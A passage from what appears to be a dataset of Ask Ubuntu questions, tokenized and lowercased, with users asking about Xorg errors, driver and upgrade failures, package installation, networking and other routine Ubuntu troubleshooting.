130508.032 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 130508.032 ] compiled for 1.11.3 , module version = 1.0.0 [ 130508.032 ] abi class : x.org server extension , version 6.0 [ 130508.032 ] ( == ) aiglx enabled [ 130508.032 ] ( ii ) loading extension glx [ 130508.115 ] ( ii ) loadmodule : `` record '' [ 130508.115 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 130508.147 ] ( ii ) module record : vendor= '' x.org foundation '' [ 130508.147 ] compiled for 1.11.3 , module version = 1.13.0 [ 130508.147 ] module class : x.org server extension [ 130508.147 ] abi class : x.org server extension , version 6.0 [ 130508.147 ] ( ii ) loading extension record [ 130508.147 ] ( ii ) loadmodule : `` dri '' [ 130508.147 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 130508.204 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 130508.204 ] compiled for 1.11.3 , module version = 1.0.0 [ 130508.204 ] abi class : x.org server extension , version 6.0 [ 130508.204 ] ( ii ) loading extension xfree86-dri [ 130508.204 ] ( ii ) loadmodule : `` dri2 '' [ 130508.204 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 130508.219 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 130508.219 ] compiled for 1.11.3 , module version = 1.2.0 [ 130508.219 ] abi class : x.org server extension , version 6.0 [ 130508.219 ] ( ii ) loading extension dri2 [ 130508.219 ] ( == ) matched xgi as autoconfigured driver 0 [ 130508.219 ] ( == ) matched vesa as autoconfigured driver 1 [ 130508.219 ] ( == ) matched fbdev as autoconfigured driver 2 [ 130508.219 ] ( == ) assigned the driver to the xf86configlayout [ 130508.219 ] ( ii ) loadmodule : `` xgi '' [ 130508.219 ] ( ww ) warning , could n't open module xgi [ 130508.219 ] ( ii ) unloadmodule : `` xgi '' [ 130508.219 ] ( ii ) unloading xgi [ 130508.219 ] ( ee ) failed to load module `` xgi '' ( module does not exist , 0 ) [ 130508.219 ] ( ii ) loadmodule : `` vesa '' [ 130508.219 ] ( ww ) warning , could n't open module vesa [ 130508.219 ] ( ii ) unloadmodule : `` vesa '' [ 130508.219 ] ( ii ) unloading vesa [ 130508.219 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 130508.219 ] ( ii ) loadmodule : `` fbdev '' [ 130508.220 ] ( ww ) warning , could n't open module fbdev [ 130508.220 ] ( ii ) unloadmodule : `` fbdev '' [ 130508.220 ] ( ii ) unloading fbdev [ 130508.220 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 130508.220 ] ( == ) matched xgi as autoconfigured driver 0 [ 130508.220 ] ( == ) matched vesa as autoconfigured driver 1 [ 130508.220 ] ( == ) matched fbdev as autoconfigured driver 2 [ 130508.220 ] ( == ) assigned the driver to the xf86configlayout [ 130508.220 ] ( ii ) loadmodule : `` xgi '' [ 130508.220 ] ( ww ) warning , could n't open module xgi [ 130508.220 ] ( ii ) unloadmodule : `` xgi '' [ 130508.220 ] ( ii ) unloading xgi [ 130508.220 ] ( ee ) failed to load module `` xgi '' ( module does not exist , 0 ) [ 130508.220 ] ( ii ) loadmodule : `` vesa '' [ 130508.220 ] ( ww ) warning , could n't open module vesa [ 130508.220 ] ( ii ) unloadmodule : `` vesa '' [ 130508.220 ] ( ii ) unloading vesa [ 130508.220 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 130508.220 ] ( ii ) loadmodule : `` fbdev '' [ 130508.220 ] ( ww ) warning , could n't open module fbdev [ 130508.220 ] ( ii ) unloadmodule : `` fbdev '' [ 130508.220 ] ( ii ) unloading fbdev [ 130508.220 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 130508.220 ] ( ee ) no drivers available . [ 130508.220 ] fatal server error : [ 130508.220 ] no screens found [ 130508.220 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 130508.220 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 130508.220 ] that 's about the extent of my xorg diagnostic skills - i 'm comfortable around a commandline , but i 've not had to mess with xorg at all since the dark days of pre-ubuntu . i.e. , not for many years . can anyone suggest what i do next ? thanks !
124827	how to install gimp 2.8 on 11.04 ?	i 've tried sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp but , this is n't working . i 'm using ubuntu 11.04 .
124829	should i restart my pc if unity crashes during upgrade ?	i am suffering from the bug which crashes ubuntu when i click alt+tab : https : //bugs.launchpad.net/unity/+bug/975168 . while i was doing a do-release-upgrade -d just now to install 12.04 , i accidentally clicked alt+tab . now unity crashed , alt+ctrl+f2 does n't work . all i have is a blank screen . usually unity used to restart by itself but it did n't this time . so my question is , since the upgrade has already finished downloading the packages and was installing them during the crash , should i leave the pc alone as it maybe still installing in the background ? or should i restart it ( by holding the power button or ctrl+alt+delete ) ?
124840	java application font size	i have downloaded a java program with a gui . i do not have its source . i am wondering if there is a general java configuration to change font size in all programs ( or , even better , in this one program ) this program seems to be made with swing
124845	e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages	i am not sure what caused this error , but here is what the whole error says , and also this is sitting as a notification , and preventing me from updating any software using update manager - please provide some assistance or tell me how to figure out what to do to fix it . could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade . please report this bug against the 'update-manager ' package and include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . '
124850	how to loop through arguments in bash ( $ 1 $ 2 $ 3 and so forth ) ?	i have the following code snippet for num do echo $ num done but i do n't understand why it works ! how come does bash know to loop through my params $ 1 , $ 2 , $ 3 , $ ... using my personal taste of `` num '' variable ? ? ?
124856	ubuntu 12.04 hangs after update	i have just updated my ubuntu 12.04 yo the latest version . it asked me to restart to complete the update . when i restarted my sysytem it hangs at loading page ... . and keeps showing me that loading status bar again and again . even in recovery mode it keeps showing up the same thing its loading loading and loading but nothing is hapening . i waited for full 30-35 minutes but i dont know what is it loading . upon pressing up some key it shows the background proessing taking place . starting web server apache2 starting anac ( h ) ronistic stopping anac ( h ) ronistic checking battery state stopping sysytem v runlevel compatibility starting mysql server after this nothing is happening ... ... edit doing alt+ctrl+f ! opens termainal donsole i can login there and start ubuntu by typing startx or lightdm edit from terminal output on rynlevel is : sahil @ sahil : ~ $ runlevel n 2 sahil @ sahil : /etc/rc2.d $ ls readme s20vboxweb-service s70dns-clean s10adbd s20virtualbox s70pppd-dns s20kerneloops s20winbind s75sudo s20redis-server s20yum-updatesd s91apache2 s20speech-dispatcher s45landscape-client s99acpi-support s20sphinxsearch s50pulseaudio s99grub-common s20vboxballoonctrl-service s50rsync s99ondemand s20vboxdrv s50saned s99rc.local content of /etc/init/lightdm.conf are : lightdm - light display manager # # the display manager service manages the x servers running on the # system , providing login and auto-login services # # based on gdm upstart script description `` lightdm display manager '' author `` robert ancell < robert.ancell @ canonical.com > '' start on ( ( filesystem and runlevel [ ! 06 ] and started dbus and ( drm-device-added card0 primary_device_for_display=1 or stopped udev-fallback-graphics ) ) or runlevel prevlevel=s ) stop on runlevel [ 016 ] emits login-session-start emits desktop-session-start emits desktop-shutdown script if [ -n `` $ upstart_events '' ] then # check kernel command-line for inhibitors , unless we are being called # manually for arg in $ ( cat /proc/cmdline ) ; do if [ `` $ arg '' = `` text '' ] ; then plymouth quit || : stop exit 0 fi done [ ! -f /etc/x11/default-display-manager -o `` $ ( cat /etc/x11/default-display-manager 2 > /dev/null ) '' = `` /usr/bin/lightdm '' -o `` $ ( cat /etc/x11/default-display-manager 2 > /dev/null ) '' = `` /usr/sbin/lightdm '' ] || { stop ; exit 0 ; } if [ `` $ runlevel '' = s -o `` $ runlevel '' = 1 ] then # single-user mode plymouth quit || : exit 0 fi fi exec lightdm end script post-stop script if [ `` $ upstart_stop_events '' = runlevel ] ; then initctl emit desktop-shutdown fi end script
124858	how to setup widescreen resolutions ? intel graphics media accelerator 3000	i have an ibm thinkcentre with an 'intel graphics media accelerator 3000 ' but ubuntu only shows 4:3 resolutions in the display settings . is there an easy way to add support for widescreen resolutions ? or is it possible to install the windows display driver ? i 'm using the most recent release of ubuntu , i do n't know exactly which version . my computer : 1 . thinkcentre m55 ( 8813-a64 ) based on 8808-9hu : 2 . intel & reg core 2 duo processor e6300 , 4 . 2gb , 5 . 160gb 7200rpm s-ata hdd , 6 . pci/pcie small form factor ( 2x3 ) , 7 . intel graphics media accelerator 3000 , 8 . 16x dvd-rom , 9 . broadcom gigabit ethernet , 10 . dos license
124861	how do i remove mobile broadband connections that do n't appear under `` edit connections ... '' ?	when i first tried to use my mobile to connect to the internet , i created a mobile broadband connection . i did this by opening bluetooth > preferences and ticking `` access the internet using your mobile phone ( dun ) '' . usually , when my phone is within bluetooth range i open the network indicator , click on the mobile connection , and it is established . sometimes , however , this does n't work and the bluetooth connection times out . [ 1 ] then , the only way i can establish an internet connection is to again open bluetooth > preferences and tick the box again . this creates a brand new mobile broadband connection . when i click on the new mobile connection , it works . however , i now have several duplicate mobile connections under my network indicator . when i click on `` edit connections ... '' , they do not appear under the mobile broadband tab . nor when i run gksu nm-connection-editor . where are they stored and how do i get rid of them ? [ 1 ] i assume this is a bug . advice what to do when it happens again so i can file it accurately would be appreciated : )
124869	how do i install cinnamon themes on ubuntu 12.04 ?	i just installed ubuntu 12.04 , but i prefer cinnamon . i installed the ppa : gwendal-lebihan-dev/cinnamon-nightly and cinnamon works . some of the icons are blank . if i go to the cinnamon-spices website and download a theme ... i 'm told to extract it into the /usr/share/themes directory . when i attempt this , i get an error that says : '' you do n't have the right permissions to extract archives in the folder 'file : ///usr/share/themes ' '' . i assume that since i 'm unable to log in as root , that there 's another way to accomplish this ? how ?
124870	how can i get a ubuntu box to appear on the network as a streaming device for a ipad	we 're creating a solution which is basically a ubuntu desktop connected to a projector and managed by a ipad , is there something i can install on the ubuntu box so that i could play a video from youtube from the ipad , using the same thing you use to play to a apple tv , so instead of 'view on apple tv ' it would be 'view on ubuntubox'
124878	updated nvidia graphics driver , now wo n't make it past the boot screen	i recently installed a asus gtx560 graphics card in my desktop and out of the box everything was working fine . i decided to check for available updates and one of the suggested ones was the most current nvidia driver . after instillation , i rebooted and now the os makes it to one screen past the boot loader . it is a screen with multiple tests being run and a few of the answers are `` no '' . i tried booting in recovery and safe mode and removing the nvidia driver update through the terminal but still to no avail . i do n't want to have to do a clean install of ubuntu to get my system back because i have 3 years worth of files on the disk . i feel very lost after spending hours on the forums and i would really appreciate any help .
124881	ubuntu 12.04 , windows vanish for an instant , when changing them from workspace	i am using a samsung 300v with core i7-2630qm cpu @ 2.00ghz x 8 , intel hd graphics 3000 , and 6 gb of ram . i use to have ubuntu 11.10 installed and i did not have this problem . recently when i changed to the latest beta of ubuntu 12.04 i noticed that sometimes when i move a window from one workspace to another , it vanishes for an instant and then appears , making it look like an interrupted movement ( does n't look fluid ) , which basically looks bad . it also happens if i change from workspace , without moving a window . does anyone knows why this might be happening ? thanks . juan
124882	change font size in skype messaging	is there a way to change the size of the font in the chat/messaging used in skype on ubuntu ? i 'm using skype beta 2.2.0.35 , and ubuntu 11.10 . currently the font is too small for me , and there does n't seem to be any obvious was to change this in the skype options .
124887	ca n't recognize my colorpage hr6 slim scanner	am using ubuntu 11.10 and i have scanner called `` genius colorpage hr6x slim '' and when i run simple scan it just ca n't detected it ; i tried `` xsane '' but it gave the same answer ! when i run `` dmesg '' it give me this output : bus 004 device 003 : id 0458:2019 kye systems corp. ( mouse systems ) colorpage-hr6x slim so what should i do i heard that some people put file from scanner windows cd with `` .usb '' or `` .bin '' to `` sane '' folder so sane will detected ! ! but my cd does n't have `` .usb '' but it have file with the name `` layout.bin '' how can i make this file to make ubuntu recognize my scanner ? ! or is there 's any software for scanner driver other than `` sane '' ? thanks in advance ( ^_^ ) .
124893	mounting an unknown filesystem type	i 'm in possession of a 100g disk that sports a partition that i have not been able to mount . using partx -o type on the device tells me the partition has type 0xa5 , generally associated with bsd operating systems . executing a plain mount command tells me i need to specify a filesystem type . from the 0xa5 marker i concluded it could be some version of ufs . mount -t ufs -o ufstype=ufs2 ( the default for modern freebsd , right ? ) did not yield a successful mount . dmesg complains about missing `` magic numbers '' . trying a number of the alternative options for ufstype has the same results . questions : does anyone have any tips for figuring out how to access the data on this partition ? is there a generic way to autodetect/mount partitions that i could use ?
124894	is there a way to access `` appearence '' in lubuntu ?	how do i access the `` system settings '' - > `` appearance '' in lubuntu ? i am trying to change the background , but for some reason the right click option doesnt show preferences . any ideas how i could access the settings and within that `` appearance '' ?
124897	how to detach a screen on a terminal ?	maybe this is a dumb question . i know how to start a screen or how to list different screens . screen -ls or to attached.. there are screens on : 2477.pts-0.server1 ( detached ) 2522.pts-0.server1 ( detached ) 2 sockets in /var/run/screen/s-root . screen -r 2477.pts-0.server1 but i keep forgeting how to detach a screen . can anyone give me and answer ? i want you to show me the exact keys ( really do n't remember ) this is a good way to have an easy way to keep it simple to search in the future
124898	how 12.04 is going to be better than 10.04 ?	how 12.04 is going to be better than 10.04 ? should i really download 12.04 on the release date in 2 days ? is it going to be faster or what ? thank you .
124904	`` missed a pm interrupt '' in syslog	i 've recently started getting the following messages in /var/log/syslog about every minutes . googled `` missed a pm interrupt '' but no useful results have come up . except that sudo is somewhat slower than it was used to be , nothing seems wrong with my server for now . can i ignore this messages ? apr 25 07:45:12 whale kernel : [ 479065.384519 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- apr 25 07:45:12 whale kernel : [ 479065.384538 ] warning : at /build/buildd/linux-3.0.0/drivers/gpu/drm/i915/i915_irq.c:649 ironlake_irq_handler+0x971/0x980 [ i915 ] ( ) apr 25 07:45:12 whale kernel : [ 479065.384541 ] hardware name : ms-7680 apr 25 07:45:12 whale kernel : [ 479065.384543 ] missed a pm interrupt apr 25 07:45:12 whale kernel : [ 479065.384545 ] modules linked in : snd_hda_codec_hdmi snd_hda_codec_realtek i915 snd_hda_intel snd_hda_codec snd_hwdep snd_pcm coretemp drm_kms_helper drm snd_timer snd soundcore usb_storage psmouse snd_page_alloc i2c_algo_bit serio_raw lp uas shpchp mei ( c ) video parport ahci libahci r8169 apr 25 07:45:12 whale kernel : [ 479065.384573 ] pid : 0 , comm : swapper tainted : g wc 3.0.0-17-generic-pae # 30-ubuntu apr 25 07:45:12 whale kernel : [ 479065.384576 ] call trace : apr 25 07:45:12 whale kernel : [ 479065.384585 ] [ < c1050722 > ] warn_slowpath_common+0x72/0xa0 apr 25 07:45:12 whale kernel : [ 479065.384596 ] [ < f88e6be1 > ] ? ironlake_irq_handler+0x971/0x980 [ i915 ] apr 25 07:45:12 whale kernel : [ 479065.384606 ] [ < f88e6be1 > ] ? ironlake_irq_handler+0x971/0x980 [ i915 ] apr 25 07:45:12 whale kernel : [ 479065.384611 ] [ < c10507f3 > ] warn_slowpath_fmt+0x33/0x40 apr 25 07:45:12 whale kernel : [ 479065.384621 ] [ < f88e6be1 > ] ironlake_irq_handler+0x971/0x980 [ i915 ] apr 25 07:45:12 whale kernel : [ 479065.384627 ] [ < c10b42cb > ] try_one_irq+0x7b/0xe0 apr 25 07:45:12 whale kernel : [ 479065.384634 ] [ < c154b9ce > ] misrouted_irq+0x4d/0x75 apr 25 07:45:12 whale kernel : [ 479065.384638 ] [ < c10b45e2 > ] note_interrupt+0x82/0x150 apr 25 07:45:12 whale kernel : [ 479065.384642 ] [ < c10b2b4e > ] handle_irq_event_percpu+0x9e/0x200 apr 25 07:45:12 whale kernel : [ 479065.384647 ] [ < c102df58 > ] ? default_spin_lock_flags+0x8/0x10 apr 25 07:45:12 whale kernel : [ 479065.384652 ] [ < c155dbad > ] ? _raw_spin_lock_irqsave+0x2d/0x40 apr 25 07:45:12 whale kernel : [ 479065.384657 ] [ < c10b2ceb > ] handle_irq_event+0x3b/0x60 apr 25 07:45:12 whale kernel : [ 479065.384661 ] [ < c10b4da0 > ] ? unmask_irq+0x30/0x30 apr 25 07:45:12 whale kernel : [ 479065.384666 ] [ < c10b4dee > ] handle_fasteoi_irq+0x4e/0xc0 apr 25 07:45:12 whale kernel : [ 479065.384668 ] < irq > [ < c1565352 > ] ? do_irq+0x42/0xc0 apr 25 07:45:12 whale kernel : [ 479065.384676 ] [ < c15651b0 > ] ? common_interrupt+0x30/0x38 apr 25 07:45:12 whale kernel : [ 479065.384682 ] [ < c14500e0 > ] ? pci_mmcfg_write+0xe0/0x100 apr 25 07:45:12 whale kernel : [ 479065.384687 ] [ < c145b582 > ] ? kfree_skb+0x12/0x90 apr 25 07:45:12 whale kernel : [ 479065.384691 ] [ < c145ab07 > ] ? __skb_clone+0x27/0xd0 apr 25 07:45:12 whale kernel : [ 479065.384697 ] [ < c151d839 > ] ? packet_rcv_spkt+0x69/0x140 apr 25 07:45:12 whale kernel : [ 479065.384702 ] [ < c14672ae > ] ? __netif_receive_skb+0x3de/0x4a0 apr 25 07:45:12 whale kernel : [ 479065.384707 ] [ < c1467d9f > ] ? netif_receive_skb+0x6f/0x80 apr 25 07:45:12 whale kernel : [ 479065.384711 ] [ < c1467ec7 > ] ? napi_skb_finish+0x37/0x50 apr 25 07:45:12 whale kernel : [ 479065.384715 ] [ < c1468331 > ] ? napi_gro_receive+0xa1/0xb0 apr 25 07:45:12 whale kernel : [ 479065.384721 ] [ < f8432bec > ] ? rtl8169_rx_interrupt.isra.67+0x9c/0x2b0 [ r8169 ] apr 25 07:45:12 whale kernel : [ 479065.384728 ] [ < f8433c80 > ] ? rtl8169_poll+0x30/0x80 [ r8169 ] apr 25 07:45:12 whale kernel : [ 479065.384733 ] [ < c14684fd > ] ? net_rx_action+0x10d/0x220 apr 25 07:45:12 whale kernel : [ 479065.384737 ] [ < c116f7b0 > ] ? aio_queue_work+0x30/0x30 apr 25 07:45:12 whale kernel : [ 479065.384742 ] [ < c1057350 > ] ? local_bh_enable_ip+0x90/0x90 apr 25 07:45:12 whale kernel : [ 479065.384746 ] [ < c10573d1 > ] ? __do_softirq+0x81/0x1a0 apr 25 07:45:12 whale kernel : [ 479065.384751 ] [ < c1057350 > ] ? local_bh_enable_ip+0x90/0x90 apr 25 07:45:12 whale kernel : [ 479065.384753 ] < irq > [ < c1057716 > ] ? irq_exit+0x76/0xa0 apr 25 07:45:12 whale kernel : [ 479065.384760 ] [ < c156535b > ] ? do_irq+0x4b/0xc0 apr 25 07:45:12 whale kernel : [ 479065.384764 ] [ < c1073a63 > ] ? __hrtimer_start_range_ns+0x163/0x400 apr 25 07:45:12 whale kernel : [ 479065.384769 ] [ < c15651b0 > ] ? common_interrupt+0x30/0x38 apr 25 07:45:12 whale kernel : [ 479065.384774 ] [ < c105007b > ] ? unregister_exec_domain+0x4b/0x80 apr 25 07:45:12 whale kernel : [ 479065.384779 ] [ < c12e32f7 > ] ? intel_idle+0xb7/0x110 apr 25 07:45:12 whale kernel : [ 479065.384784 ] [ < c143fe0d > ] ? cpuidle_idle_call+0x7d/0x240 apr 25 07:45:12 whale kernel : [ 479065.384789 ] [ < c1008c7a > ] ? cpu_idle+0x8a/0xc0 apr 25 07:45:12 whale kernel : [ 479065.384793 ] [ < c152dd85 > ] ? rest_init+0x5d/0x68 apr 25 07:45:12 whale kernel : [ 479065.384798 ] [ < c1802774 > ] ? start_kernel+0x352/0x358 apr 25 07:45:12 whale kernel : [ 479065.384801 ] [ < c18023b3 > ] ? pass_bootoption.constprop.2+0xe2/0xe2 apr 25 07:45:12 whale kernel : [ 479065.384805 ] [ < c18020ba > ] ? i386_start_kernel+0xa9/0xaf apr 25 07:45:12 whale kernel : [ 479065.384808 ] -- - [ end trace 49847d47cca5a812 ] -- -
124906	windows 7 and 11.10 side by side from scratch what am i doing wrong ?	i have tried everything i can think of at this point and i 'm at a total loss . i have a 2tb drive i want to install windows 7 and 11.10 ( both are 64 bit ) side by side , but once i install windows it must need gpt to work or something because no matter how many times i 've removed it , it always returns . if i use gdisk and set the disk as mbr , windows wo n't load . now this last time i ran gdisk and tried to boot into windows before i installed ubuntu all the way and ended up at a grub rescue prompt . any help please ? also let me say i have been searching and reading for days and have tried everything i can find to make this work so this is n't a one time event , it 's continual .
124909	thunderbird-couchdb could not be installed	i 'm desperately trying to get my thunderbird/ubuntu one contacts to sync . a little back story : i recently upgraded to ubuntu 11.10 . i 've been using evolution for my mail and contact for a very long time . recently ( last couple of days ) i 've been having more and more problems with evolution not opening , emails not sending/receiving , etc . i decided today when evolution would n't open at all to switch everything to thunderbird . i uninstalled evolution as i am low on disc space . now when i try to set up thunderbird to use the contact in my ubuntu one account , i receive the error message that the thunderbird-couchdb plugin could not be installed . nothing further . thunderbird version is 11.0.1 . any thoughts ?
124919	how can i permanently apply this workaround to get the backlight working on an emachines e525 ?	there is a display bug that i 've been trying to find information on for a while now involving the `` emachines e525 notebook computer '' and it 's `` backlight '' , when using ubuntu , xubuntu , lubuntu , and kubuntu 11.04-11.10 . every time my computer gos to sleep the backlight gets shut off . all i could find online was that i had to switch to the root of the system and edit the /etc/rc.local file , adding setpci -s 00:02.0 f4.b=00 before the exit 0 at the end of the file . i did , and when i restart the computer i can see that the backlight is on , however when the computer gos to sleep or the lid gets closed , the backlight goes off and i have to open `` terminal '' and type in sudo setpci -s 00:02.0 f4.b=00 . i guess my real question is , is there a line of code i could enter into the grub menu or the /etc/rc.local file to make the backlight stay on ? if anybody has any possible fixes for this bug , and would like to share the information with me , it would be highly appreciated .
124921	boot from usb thumb drive : the installed ( octave ) pkg not there and forever after , on subsequent boot !	i successfully installed and used octave from a usb thumb drive for a toshiba 205 netbook . everything was fine . then i quit and re-booted . octave had disappeared from the launcher . and , i ca n't find relevant files in , say , the archive director or any other directory . repeated . same result . please advise .
124927	in system monitor what is the difference between kill process and end process	when i want to kill a process via system monitor i am presented with 2 quick ways , kill process and end process . what is the difference between this two ?
124929	how can i horizontally invert the video output of the webcam	when i use for example cheese i want that when i move my right hand , in the video and see myself moving the right hand of my image instead of me moving the left hand . what i mean with this is that if my move my right side , in the video the right side should move , not the left side ( as seen through the eye of the webcam ) . basically to invert horizontally the image .
124932	different nameservers for different networks	i use ubuntu 12.04 on my work laptop . currently i live abroad and i only have this one computer , and i take it home after work to use as my personal computer . the problem is that the nameserver used on the office network differs from the nameserver on my own network at home . at the office i need to use 10.4.180.250 , and at home i need to use 192.168.1.1 . my /etc/dhcp3/dhclient.conf has this line in it : prepend domain-name-servers 192.168.1.1 ; when i connect to the work network i need to manually change my resolv.conf and change the nameserver to 10.4.180.250 . then i connect to another office in another country with a vpn , and the resolv.conf gets reset and i need to change the nameserver back to 10.4.180.250 again . is it possible to always have both nameservers in my resolv.conf by using multiple prepends ? prepend domain-name-servers 192.168.1.1 ; prepend domain-name-servers 10.4.180.250 ; or : prepend domain-name-servers 192.168.1.1 10.4.180.250 ; are there disadvantages to having a nameserver that is `` invalid '' for the current network ? it there a better way to do it ?
124935	banshee sound menu integration in 12.04	so since they decided to switch back to rhythmbox as the default music player , rhythmbox turned out to be the default in the sound menu as well . the only problem is that i do n't really use rhythmbox , and have everything the way i want to in banshee already . so i set my default music player to banshee , but the default in the sound menu is still shown as rhythmbox . okay . banshee shows up when i manually start it , but it turns out that rhythmbox is still sitting at the top there . it 's a bit annoying , since i never click on it anyway ... so is there a way to get banshee back as the default in the sound menu ?
124936	raid destroyed after upgrading ubuntu to 12.04 from disk	i ran the upgrade from the iso and after booting my raid 5 array no longer appears to exist . i will admit to on caveat that i was upgrading what was technically initially ( months ago and before many changes to the os ) an ubuntu server install to ubuntu desktop . that fact aside is it really the default behavior of the upgrade to destroy a raid array . i am going to keep looking as i am sure i must have just missed something myself .
124937	wired internet is connected to internet , but no internet access !	yeah , in the bottom right corner it shows i 'm connected and everything , but it shows that the internet is n't working . wired that is ; is not working . it always stops working at a certain time which is 9:00 o'clock . i use to have parental controls , but according to my step-dad it is n't there anymore . can someone help ?
124938	no root file system - alternate cd + lvm	i am trying to install 11.10 as dual boot with windows 7 . i have all partitioned well as you can see here : http : //www.flickr.com/photos/42897978 @ n00/7111180385/ i burned the alternate cd iso to a cd . boot from it and followed instructions to partitioning . there , i configured the lvm partitions as follows : volume group ubuntu-vg - uses physical volume /dev/sda7 380gb - provides logical volume home-lv 60gb - provides logical volume root-lv 60gb - provides logical volume swap-lv 6gb that is all i want ( note that my /boot is outside of lvm ) then when i say that all is ok and to write it to disk and continue with the installation , i get the following error . ! ! partition disks no root file system no root file system is defined please correct this from the partitioning menu . what should i fix and how ? i tried issuing the `` revert changes to partitions '' , but nothing happens . it seems that the lvm configuration has already been written to the cd . help ! !
124943	how retrieve files in a minimal ubuntu installation ? aka how apt-get retrieves files ?	i 'm running pbuilder , which setup a minimal ubuntu installation , and i 'd like to retrieve some files without âťwgetâť ( it 's not installed by default ) , since apt-get can retrieve .deb files i imagine there must be a way
124944	incorrect permissions after copying over scp	i 'm using cygwin in windows 7 to copy a directory to an ubuntu machine using this command . scp -rp -p 54322 /cygdrive/c/xampp/htdocs/ . user @ 10.136.10.1 : /home/user/somefolder/ after copying all the files , they all have `` no read , no write '' permissions . does anyone know why ? alternatively if i copy /cygdrive/c/xampp/htdocs/ to /cygdrive/c/users/user and then use scp to copy the files . the permissions are correct . -- -- -- -- -- 1 user user 1273 apr 21 16:32 about.html -- -- -- -- -- 1 user user 1707 apr 21 16:33 contact.html d -- -- -- -- - 2 user user 4096 apr 21 04:14 images -- -- -- -- -- 1 user user 2259 apr 21 22:27 index.html -- -- -- -- -- 1 user user 1252 apr 21 16:33 projects.html -- -- -- -- -- 1 user user 823 apr 22 22:03 style.css drwx -- -- -- 6 user user 4096 apr 21 02:11 xampp
124947	something like parallels desktop for linux ?	i 'm not normally a fan of mac software implementations , but recently i saw a copy of parallels desktop for mac that i was very much impressed by . i looked into parallel 's offerings for linux ( i was initially excited that they developed for *nix ) but found that it has essentially the same features as vmware . does anyone know if there is a software solution for linux that offers the level of integration that the current parallels deesktop for mac has ? i looked into wine for the programs i want to run and was very frustrated . i feel like all the ratings in their application database were fabricated honesty . i 've tried wine once every ubuntu release since 8.10 and have never gotten it to work stably .
124950	how to rotate syslog daily ?	i want to rotate my syslog daily ... how do i do this ? how to check whether log rotate is working ? how to make it run daily ? by default , does ubuntu server run logrotate daily ? or do i have to set it after installation ?
124953	what is the command line for skype installation ?	i am wondering what the command line is for the installation of skype-ubuntu_2.2.0.35-1_i386.deb from the terminal ?
124958	can not execute azureus ( vuze )	i downloaded vuze from official site as tar.bz2 file . set up jre . now if i try to execute it says starting azureus ... suitable java version found [ java = 1.6.0_31 ] configuring environment ... java exec found in path . verifying ... browser check failed with : can not load 64-bit swt libraries on 32-bit jvm auto-scanning for gre/xulrunner . you can skip this by appending the gre path to ld_library_path and setting mozilla_five_home . checking /usr/lib/firefox-11.0 for gre gre found at /usr/lib/firefox-11.0 . browser check failed with : could not initialize class org.eclipse.swt.widgets.display ca n't create browser . will try to set ld_library_path and hope vuze has better luck . setting ld_library_path to : /usr/lib/firefox-11.0 setting mozilla_five_home to : /usr/lib/firefox-11.0 loading azureus : java -xmx128m -cp `` ./azureus2.jar : ./swt.jar '' -djava.library.path= '' /home/apple/downloads/azureus '' -dazureus.install.path= '' /home/apple/downloads/azureus '' -dazureus.script= '' ./azureus '' -dazureus.script.version=2 org.gudy.azureus2.ui.swt.main file : /home/apple/downloads/azureus/azureus2.jar ; file : /home/apple/downloads/azureus/swt.jar ; file : /home/apple/downloads/azureus/ changelocale : *default language* ! = english ( india ) . searching without country.. changelocale : searching for language english in *any* country.. changelocale : no message properties for locale 'english ( india ) ' ( en_in ) , using 'english ( default ) ' java.lang.reflect.invocationtargetexception at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:39 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:27 ) at java.lang.reflect.constructor.newinstance ( constructor.java:513 ) at org.gudy.azureus2.ui.swt.main. < init > ( main.java:114 ) at org.gudy.azureus2.ui.swt.main.main ( main.java:292 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:39 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:25 ) at java.lang.reflect.method.invoke ( method.java:597 ) at com.aelitis.azureus.launcher.mainexecutor $ 1.run ( mainexecutor.java:37 ) at java.lang.thread.run ( thread.java:662 ) caused by : java.lang.unsatisfiedlinkerror : can not load 64-bit swt libraries on 32-bit jvm at org.eclipse.swt.internal.library.loadlibrary ( library.java:214 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.gudy.azureus2.ui.swt.mainwindow.swtthread. < init > ( swtthread.java:84 ) at org.gudy.azureus2.ui.swt.mainwindow.swtthread.createinstance ( swtthread.java:63 ) at com.aelitis.azureus.ui.swt.initializer. < init > ( initializer.java:162 ) ... 12 more exit from azureus complete no shutdown tasks to do azureus terminated . is it caused by swt.jar ? how to get rid from this ?
124962	unable to install updates in ubuntu server	unable to install ubuntu server 11.10 updates . when i try to update using apt i get the following error : reading package lists ... done building dependence tree ... . done e : unable to locate package update can you please provide a solution ?
